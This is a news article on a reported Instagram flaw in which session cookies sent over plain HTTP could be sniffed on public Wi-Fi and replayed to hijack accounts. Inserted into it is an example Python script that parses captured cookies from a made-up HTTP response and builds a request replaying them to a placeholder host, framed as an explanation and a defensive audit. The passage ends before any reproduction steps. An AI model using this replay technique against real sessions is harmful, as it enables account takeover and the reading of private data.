Stevie Graham, a London-based developer, recently submitted a bug report to Facebook outlining what he saw as a security vulnerability in Instagram that would allow someone to hijack a user’s session based on data captured over a public Wi-Fi network. When he was told that he wouldn’t get a bug bounty from Facebook, which owns Instagram, he tweeted about it—and set about building a proof-of-concept tool to exploit it. “Denied bug bounty. Next step is to write automated tool enabling mass hijacking of accounts,” he wrote. “Pretty serious vuln, FB. please fix.”
As we reported in our recent coverage of mobile application privacy holes, Instagram uses plain HTTP for much of its traffic, passing the user's account name and numeric account ID in the clear. As Graham demonstrated, more than that is exposed. Although the user's credentials are submitted over a secure (HTTPS) connection, the responses Instagram's API sends back to the iOS client carry a session cookie, and that cookie also travels in the clear. Anyone who captures it on the same Wi-Fi network can present it to Instagram's web site and be treated as that user, with no reauthentication, and read private messages and other account data. "Once you have a cookie, any endpoint can be authenticated with the cookie, HTTPS or HTTP," he wrote. Graham said that he has known about the flaw for years.
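The mechanism described above, as an added example that is not part of the article and is not Graham's tool: a passive sniffer on the same network sees the plaintext HTTP response, pulls the session cookie out of its Set-Cookie headers, and can build the request that replays it. The captured response, the cookie names (sessionid, csrftoken, tracking) and the host are all constructed for the example and are not Instagram's real values. It also shows the check a practitioner would run on a capture: a cookie set or sent over plain HTTP is exposed no matter what attributes it has, and a cookie that lacks the Secure attribute will be re-sent by the client on later HTTP requests even if it was originally set over HTTPS.

```python
"""Session-cookie exposure check over a constructed HTTP capture.

Added example, not code from the article or from Stevie Graham's tool.
Cookie names, values and the host below are made up for illustration.
"""
from http.cookies import SimpleCookie

# Constructed sample: a plaintext HTTP response as a sniffer on the same
# Wi-Fi network would see it. Nothing here is a real Instagram response.
CAPTURED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json\r\n"
    "Set-Cookie: sessionid=abc123def456; Path=/; HttpOnly\r\n"
    "Set-Cookie: csrftoken=zz99; Path=/\r\n"
    "Set-Cookie: tracking=xyz; Path=/; Secure\r\n"
    "\r\n"
    '{"status":"ok"}'
)


def parse_set_cookies(raw_response: str) -> dict:
    """Return {name: {"value", "secure", "httponly"}} for every Set-Cookie header.

    Only the header block (before the blank line) is inspected; the status
    line is skipped. Parsing is delegated to http.cookies.SimpleCookie.
    """
    headers, _, _ = raw_response.partition("\r\n\r\n")
    jar = {}
    for line in headers.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "set-cookie":
            parsed = SimpleCookie()
            parsed.load(value.strip())
            for key, morsel in parsed.items():
                jar[key] = {
                    "value": morsel.value,
                    # Morsel flags are "" when absent and True when present.
                    "secure": bool(morsel["secure"]),
                    "httponly": bool(morsel["httponly"]),
                }
    return jar


def exposed_cookies(jar: dict, over_tls: bool) -> list:
    """Names of cookies an on-path attacker can read.

    If the exchange itself was plain HTTP, every cookie in it is already
    exposed (this is the Instagram case). If it was HTTPS, only cookies
    without the Secure attribute are at risk, because the client will
    attach them to any later plain-HTTP request to the same host.
    """
    if not over_tls:
        return list(jar)
    return [name for name, attrs in jar.items() if not attrs["secure"]]


def build_replay_request(host: str, path: str, jar: dict) -> str:
    """Build the raw GET request that replays every captured cookie.

    This is what "any endpoint can be authenticated with the cookie" means
    in practice: no credentials are needed, only the Cookie header.
    HttpOnly does not help here; it only stops page scripts from reading
    the cookie, not a network observer who already has it.
    """
    cookie_header = "; ".join(f"{name}={attrs['value']}" for name, attrs in jar.items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie_header}\r\n\r\n"


if __name__ == "__main__":
    cookies = parse_set_cookies(CAPTURED_RESPONSE)
    print("captured over plain HTTP, exposed:", exposed_cookies(cookies, over_tls=False))
    print("had it been HTTPS, still at risk:", exposed_cookies(cookies, over_tls=True))
    # Hypothetical host and path; a real replay would target the site's own endpoints.
    print(build_replay_request("api.example.invalid", "/account/inbox", cookies))
```

The design point is the split between the two checks: `exposed_cookies` with `over_tls=False` models the flaw the article describes, where the capture alone is enough, while the `over_tls=True` branch is the audit a defender runs on an HTTPS-only app to confirm that no session cookie is missing the Secure attribute. Setting Secure on the cookie does nothing for Instagram's case unless the API traffic itself moves to HTTPS.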
Graham posted the following steps to reproduce his findings: